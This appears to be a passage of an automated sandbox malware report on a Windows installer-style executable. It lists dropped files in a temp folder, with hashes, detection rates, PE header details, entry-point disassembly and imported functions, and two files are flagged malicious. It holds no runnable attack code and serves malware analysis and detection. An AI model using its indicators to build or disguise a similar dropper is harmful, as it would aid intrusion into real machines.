                                                          SHA-512:03CB06A55A71D5FE52D58430DFE2EAB17740C97016649E20F25ECE6D7A03A47B885993997698C19A99578554254F131EB43319DE80D29B160F11FA22F1003BA5
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".C.o.a.s.t.g.u.a.r.d.s.m.a.n.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.d.4.3.4.f.7.7.-.6.3.c.5.-.4.3.5.b.-.9.7.2.2.-.f.d.f.4.a.8.0.8.a.6.1.0.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.A.3.4.5.F.5.6.D.-.1.2.5.1.-.4.F.A.E.-.A.B.F.A.-.5.2.F.0.A.5.F.1.7.C.4.4.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".G.e.w.g.a.w.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".W.i.X. .T.o.o.l.s.e.t. .v.3...1.1. .N.a.t.i.v.e. .2.0.1.3. .S.D.K.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".5.8.3.8.3.". .P.a.c.k.a.g.e.S.i.z.e.=.".5.

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):380176
                                                          Entropy (8bit):6.432472275317664
                                                          Encrypted:false
                                                          SSDEEP:6144:TTKw9G2rivrR7YR+euVO05XMog3N0++++I333O333qj333MEq333h3333f92333O:CcN3u++++I333O333qj333MJ333h333r
                                                          MD5:496DF6AD1A158ED5037138E397713EF0
                                                          SHA1:287BD2219C955687BAA399DED57E9AB64334C63C
                                                          SHA-256:07C04290F53AAAAA7DF6B6EA3A53103B6E3EF8FF658D8097617A9C48DFC6E90A
                                                          SHA-512:422DA26A8F50C1F02C1CC7C4BED37CDB33732039BBA82F32C2A14BAA8C6A7BC5544856AB26A2071B5EA8E731A296E2C69071DA2F067312D05763AA3A9928BB3A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........O.L.!.L.!.L.!.E...F.!.WX..N.!.k.Z.N.!....M.!.#...O.!.L. ...!.#...N.!.#...F.!.#...N.!.WX..T.!.WX..M.!.WX..M.!.RichL.!.................PE..d.....)R.........." .....2...z.......:....................................................@.........................................@Y..D...t@..................|A.......#...........W...............................................P..X............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......L..............@....pdata..|A.......B...`..............@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4242944
                                                          Entropy (8bit):6.558992499072821
                                                          Encrypted:false
                                                          SSDEEP:49152:zTNFpHJVfZqJru0K1kLo7RrObviwkZcrA2P16szn0uyIeOGTrLvQb8Sg7Z:TVfZq+1kLRGIn0uy7wb8
                                                          MD5:24860E7E6DB53271D89CC5A9D7F4C73A
                                                          SHA1:AA1B31CC4B7B451B65F7D60DE02301F89C2247EF
                                                          SHA-256:1F9F015E8363E279491D893782F506617A8D97E8901B71950DD5782FD1C6A21E
                                                          SHA-512:2B16D70C1B9C0A4F38CA7B88A131E69DE2DC880FE0048860A9ED1D80AE2359E0CE0F6FBCE191CFB59FD4D0AE1D7CB8FF9D44844F45BF6206AC1B7EA1A8349F3D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=..\x..\x..\x....\x..$.\x......\x..*.\x..\y..]x.8....\x..*.\x..*..\x..*..\x.....]x..\x..\x.....]x....\x....\x.Rich.\x.........PE..d.....)R.........." .....:#..................................................pA......4A...@..........................................89.3...l.9......`@.......=.p............p@......[#..............................................P#.h............................text...i8#......:#................. ..`.rdata......P#......>#.............@..@.data.........<..^....;.............@....pdata..p.....=......>=.............@..@.rsrc........`@.......?.............@..@.reloc.......p@.......?.............@..B................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3559696
                                                          Entropy (8bit):6.200307727314802
                                                          Encrypted:false
                                                          SSDEEP:49152:AQ902GYI12BpN8G/i6Hdw2u68X5RPrftuX9wZcQm2J9FjdH0pdTrRBlkG0BjMEgr:H9DGYIob9wp68pRzVsiHI9atBjMEY
                                                          MD5:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          SHA1:6CB3212EC9BE08CB5A29BF8D37E9CA845EFC18C9
                                                          SHA-256:448402C129A721812FA1C5F279F5CA906B9C8BBCA652A91655D144D20CE5E6B4
                                                          SHA-512:9815EBA1566A8E33734F6A218071EC501DD1F799B1535E25D87C2B416B928AE8D15F8218CF20E685F9907EC39C202CBFC4728FE6AB9D87B3DE345109F626845E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................<...D......#.....'.....!.........D#...8..............,.....C..D.....D%...D"...Rich...........................PE..d.....)R.........."......R ..........|.........@..............................6.....)$7...@.................................................0.,.T....`0......0..`"....6..#... 6..:.... ..............................................p .H............................text....P ......R ................. ..`.rdata..H....p ......V .............@..@.data...h....0-.......-.............@....pdata..`"...0...$....-.............@..@.rsrc........`0.......0.............@..@.reloc...Y... 6..Z....5.............@..B........................................................................................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\ehky

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4404646
                                                          Entropy (8bit):7.953147866148555
                                                          Encrypted:false
                                                          SSDEEP:98304:Pw2L5u5Ahg6i2pmv4ECQx/gPtB09ES7GME15o:uz6xmv4JMgjBSSN15o
                                                          MD5:EB9428E9ED12824BEB9193BEA1DE018B
                                                          SHA1:804E7CF5B5EC4AE00183F7732DD4C8BEEFEC1E33
                                                          SHA-256:97DD176827F278064CD981567F992CFB7F2BA966377BE03163C9C32C28F4CB9A
                                                          SHA-512:3CC2BB1111C9BD557195DF53F041563A9BF91F03F2E1385CCB25AA5EADB6C1F7CF2D3FFBB090418C340763CD29E129BDB41C86EC2CD7975D7B02EB7CF13DBC96
                                                          Malicious:false
                                                          Preview:T...f..fibV...CHE.Ra....Z.....U.v.....T_.g....B..l.v.o.p.c\l.\s...iU._r....x]..B.F.jr...AV.D.....Yw....POx........LR^G.p_..]..c.LKE....SK..y.L..A_vF....W..Wt.o.\MS...g.rW.T....R^.Vo.n.Hr..C.Qp..UO.iTo.N.ZYuMHo..x..P...[DyEvB...`oC.e]..j....XqH[x.o.u..e\NlV.\...e.R.H..e..J.C..G.....qv..J...`J.w.f...DYs.I..r^r..Ors.m...u\b`.n..s.Vl..DW..P...G..A...g.c..od..yF[a.LK....GN..Kj..qopFp.d.ivNo....B........._I[.a.j..Bd.Uc.K.G......vb.ivLkASy....p.bh..wJ.S.hm...il.o..t.`...D.G..ACOVNKe......i.i._.[.l...LK...`..p\y.._.K.WG.....m...\xiVX.Cy.....p..K.r.F.`.M._P..Mf.KQ._.N..tgp..\aW....^...wIFj.ikO.a.dcHV\Y..UQ.l].I]]....pR.JyijxJu.jb..EY.k.[..NnUux..l.GCQH.f.o].w.P..N......O..O..EhQ....V....s._V..B.ctL..g.._d.o...ArfZ.g.x...r_vdG...GFV^L..h........wlIl.cvJ...[..Tl.Yi...mBSv.].......g.d.rs^.K.MlI..^.UmJUFW..kA..[rL..F[][...fWcj.DrPT.i.JECs.......O..........tSE..v....]hHT..g.DXK^V..[.uH..\.s[..EY_IG........D.f...Z.MD....pXBKM.....qS....]io.k.L..qmp_r.rK.G...._d.c.x`G..Z...Q..LB.L..a`X..]q.....y..K..J

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\lni

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66844
                                                          Entropy (8bit):4.603621025311295
                                                          Encrypted:false
                                                          SSDEEP:1536:wwBw6vQwfuDIO9zR3hNIyByM1kelM5VZmiXwy6Mno8aCPCzw:L2qQ3I4z/NIQyPelWtwy6Mn1auh
                                                          MD5:48AA3E0E2CB511F84BF02ABFB6BF1824
                                                          SHA1:F9C0E44CBCFACD1662420161D97AF4EAD8193368
                                                          SHA-256:8E837DBC26C3A1DE1252164FEC16FFF6D681F764CCD90ED4E42FE1E7F020808A
                                                          SHA-512:D4DDAB655C732CC3073CBFDB7CB8786B2474049AC52B713FDBA53F4C8A17ACB42D6FBDEBC55E4CD287CD37A7A00F3541578E6062D9832D0FCA48107F84A77E0A
                                                          Malicious:false
                                                          Preview:..stX..NQv[G.sUPhT.k...KA...a_F.O..M..OG^..C..C...sr]vYf......D^...^d.j..Ox...v.h..q.FF..H.S.j...JiBn..Gf.B.fxm..L..x.p.svi.k.G..A.klkgf.c...Np............w.bG`.efs.b.t.H.A..ji.........]SE.t.yb..d....Vo..k.C.Z..B.s.D...lS]..T\..]h.C\.H....r.k..YJHr..N..[YX.J..gv.k.....\.V.aecltkQ^.......b[y.Lgu...Y.da.EE..d...yf.uVwk...QAx.EJ[bxdap.B.A..g...U.QQo.Z.iU.......f......RQ..bHo[^l`..KDc.mO......T.]M.Vl.xj........]Jeli_i..g...hqB..h.....J^b^.]T..._.......UJseZ...j..].U..n.G._..h.J...Ru....iD.]CTx.soJb......r.Xk].N._.G..`n.kFnWd.G...r..T...wRj.DD...seZ.CV....YB..^....B..W.bEo..fY....nH.yTm[.I.D..pFprBb.rq^\..FE..klN.GDAh...Li\...^u_U]JBYr.Io.....Y.........Tw.L.........].ce.JJgA..X..m.CU.Q.Xh.u..DuJ..U\r.k.e...Qq...EOK.qY.r.ZE.i.]..B....ug.s.GtFKA.C.v.W.aR..n...]..t.Wtr..gFmSq..cxV..Q.b.kU.P.AE.s.QYH.d.y..VW...v....FZ..xSx.C.umJUl.....ARXO.I.].BL..o.Sw...f.fE..o.P_.dkT.mJG.uX.....mLw...X...KQP..BEE..c_iR....T...DJ...s.Z.m.bMH.._.i.x...kn.Bbe_.Y...`K.R.rLccqa.s..G.A.......o..Nv........p]].E.v.Q.

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.297676823354886
                                                          Encrypted:false
                                                          SSDEEP:12288:koBFUsQ1H5FH3YUTd/df0RA7XkNvEKZm+aWodEEiblHN/:dFUsQ1H5FHdGKkNvEKZm+aWodEEcHN/
                                                          MD5:D029339C0F59CF662094EDDF8C42B2B5
                                                          SHA1:A0B6DE44255CE7BFADE9A5B559DD04F2972BFDC8
                                                          SHA-256:934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C
                                                          SHA-512:021D9AF52E68CB7A3B0042D9ED6C9418552EE16DF966F9CCEDD458567C47D70471CB8851A69D3982D64571369664FAEEAE3BE90E2E88A909005B9CDB73679C82
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..-`..~`..~`..~i.4~b..~{.;~c..~`..~...~..?~a..~{.9~a..~{..~P..~{..~Y..~{..~e..~{.<~a..~{.=~a..~{.:~a..~Rich`..~........................PE..d.....M.........." .........f.......q........cy..........................................@.............................................m......<....P...........=...0..P....`.......................................................................................text............................... ..`.rdata..-...........................@..@.data...0L.......8..................@....pdata...=.......>..................@..@.rsrc........P......................@..@.reloc..R....`......................@..B........................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll

                                                          Download File
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):829264
                                                          Entropy (8bit):6.553848816796836
                                                          Encrypted:false
                                                          SSDEEP:12288:QgzGPEett9Mw9HfBCddjMb2NQVmTW75JfmyyKWeHQGoko+1:HzJetPMw9HfBCrMb2Kc6dmyyKWewGzB1
                                                          MD5:366FD6F3A451351B5DF2D7C4ECF4C73A
                                                          SHA1:50DB750522B9630757F91B53DF377FD4ED4E2D66
                                                          SHA-256:AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5
                                                          SHA-512:2DE764772B68A85204B7435C87E9409D753C2196CF5B2F46E7796C99A33943E167F62A92E8753EAA184CD81FB14361E83228EB1B474E0C3349ED387EC93E6130
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pm...>...>...>..>...>...>F..>...>...>...>..>...>..>...>D..>...>...>...>...>...>...>Rich...>........................PE..d......M.........." ..........................sy............................. ......A.....@.........................................pt.......`..(...............pb......P............................................................................................text...F........................... ..`.rdata..............................@..@.data...L}... ...R..................@....pdata..pb.......d...Z..............@..@_CONST..............................@...text.....2... ...4..................@.. data.........`......................@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................

                                                          C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\KClGcCpDAP.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8631353
                                                          Entropy (8bit):7.988187055903863
                                                          Encrypted:false
                                                          SSDEEP:196608:cfUS5CWOJNmZD1pqgeVSFCIrRnau//ItQ7dMzxbOmy1wbGv:sb5dQstG2VJ/kCdMEmkv
                                                          MD5:4ED56BCA0F099784A4A341321C3D0695
                                                          SHA1:46B7D39BBB0C1F75717EA86CC9ECD540995B966B
                                                          SHA-256:D33EE40EC6CE95BEF2DFE041473C7164F06E8659FBECCC4CD41ED5635E80AE20
                                                          SHA-512:D813E18E9CD7E729B93562B2C5141B7E2DEC82DD387AA367C563881C59ED5D6FA0BE44CA43A5319AC019A936B1D06C9EE9215CC1417B7284B32F52D7A645624C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................8:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...8:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.988227332156627
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:KClGcCpDAP.exe
                                                          File size:8'656'211 bytes
                                                          MD5:61d2baf57c3ed6eda2d72720fc54ed04
                                                          SHA1:8c6ce6dc798b3d085102b96ffea2913efe5fb243
                                                          SHA256:08e1d8d41bef83310ed290e5b8b3821d7ead8f66709c90cd4caa27c567ab4e80
                                                          SHA512:9ae8f5ed0c0972955a1092851a6787a8c236ff3639ec2eaaeacc53298080c55c7ab38e096380e4ce961b87831eae8110872475b45776fd1c2df19e5b8c76c520
                                                          SSDEEP:196608:cfUS5CWOJNmZD1pqgeVSFCIrRnau//ItQ7dMzxbOmy1wbGZ:sb5dQstG2VJ/kCdMEmkZ
                                                          TLSH:B396333294504023F7F606B3EC2896343E7CD724075588AAE7E8AD2D3EB84D567BB257
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

                                                          File Icon

                                                          Icon Hash:2d2e3797b32b2b99

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x42e2a6
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:d7e2fd259780271687ffca462b9e69b7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F913C80F9DFh
                                                          jmp 00007F913C80F353h
                                                          mov eax, dword ptr [esp+08h]
                                                          mov ecx, dword ptr [esp+10h]
                                                          or ecx, eax
                                                          mov ecx, dword ptr [esp+0Ch]
                                                          jne 00007F913C80F4CBh
                                                          mov eax, dword ptr [esp+04h]
                                                          mul ecx
                                                          retn 0010h
                                                          push ebx
                                                          mul ecx
                                                          mov ebx, eax
                                                          mov eax, dword ptr [esp+08h]
                                                          mul dword ptr [esp+14h]
                                                          add ebx, eax
                                                          mov eax, dword ptr [esp+08h]
                                                          mul ecx
                                                          add edx, ebx
                                                          pop ebx
                                                          retn 0010h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          cmp cl, 00000040h
                                                          jnc 00007F913C80F4D7h
                                                          cmp cl, 00000020h
                                                          jnc 00007F913C80F4C8h
                                                          shrd eax, edx, cl
                                                          shr edx, cl
                                                          ret
                                                          mov eax, edx
                                                          xor edx, edx
                                                          and cl, 0000001Fh
                                                          shr eax, cl
                                                          ret
                                                          xor eax, eax
                                                          xor edx, edx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          jmp 00007F913C80F4CFh
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C815D4Ch
                                                          pop ecx
                                                          test eax, eax
                                                          je 00007F913C80F4D1h
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C815DD5h
                                                          pop ecx
                                                          test eax, eax
                                                          je 00007F913C80F4A8h
                                                          pop ebp
                                                          ret
                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                          je 00007F913C80FD64h
                                                          jmp 00007F913C80FD41h
                                                          push ebp
                                                          mov ebp, esp
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C80FD7Dh
                                                          pop ecx
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          test byte ptr [ebp+08h], 00000001h
                                                          push esi
                                                          mov esi, ecx
                                                          mov dword ptr [esi], 00460DB8h
                                                          je 00007F913C80F4CCh
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F913C80F49Dh
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x686b40xb4.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x3a38.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x3dfc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x676500x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x676a40x18.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x670300x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x3e0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x682340x100.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x499370x49a002319c0baa707bb66cc0bc08c55a13d8cFalse0.5314688561120543data6.570006046413636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x4b0000x1ed600x1ee008ad6c4e18165c6d8ccdc97bab683438dFalse0.3136386639676113data5.114228301263695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x6a0000x17300xa0000fde973df27dc2d36084e16d6dddbdfFalse0.274609375firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a146003.1526594027632213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .wixburn0x6c0000x380x200fa8b93d2867fbdcd8c704888e119383dFalse0.10546875data0.5556939563611969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0x6d0000x3a380x3c0044e0476fda5a721127283c44a2a0ea81False0.33079427083333335data5.546130373186753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x710000x3dfc0x3e00dd2c47fa48872886af4c9a2e5bd90cccFalse0.8097278225806451data6.794335469567533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x6d1780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.43185920577617326
                                                          RT_MESSAGETABLE0x6da200x2840dataEnglishUnited States0.28823757763975155
                                                          RT_GROUP_ICON0x702600x14dataEnglishUnited States1.15
                                                          RT_VERSION0x702740x2f0SysEx File - IDPEnglishUnited States0.4720744680851064
                                                          RT_MANIFEST0x705640x4d2XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminatorsEnglishUnited States0.47568881685575365

                                                          Imports

                                                          DLLImport
                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
                                                          USER32.dllPeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
                                                          OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                          GDI32.dllDeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
                                                          SHELL32.dllCommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
                                                          ole32.dllCoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
                                                          KERNEL32.dllGetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, 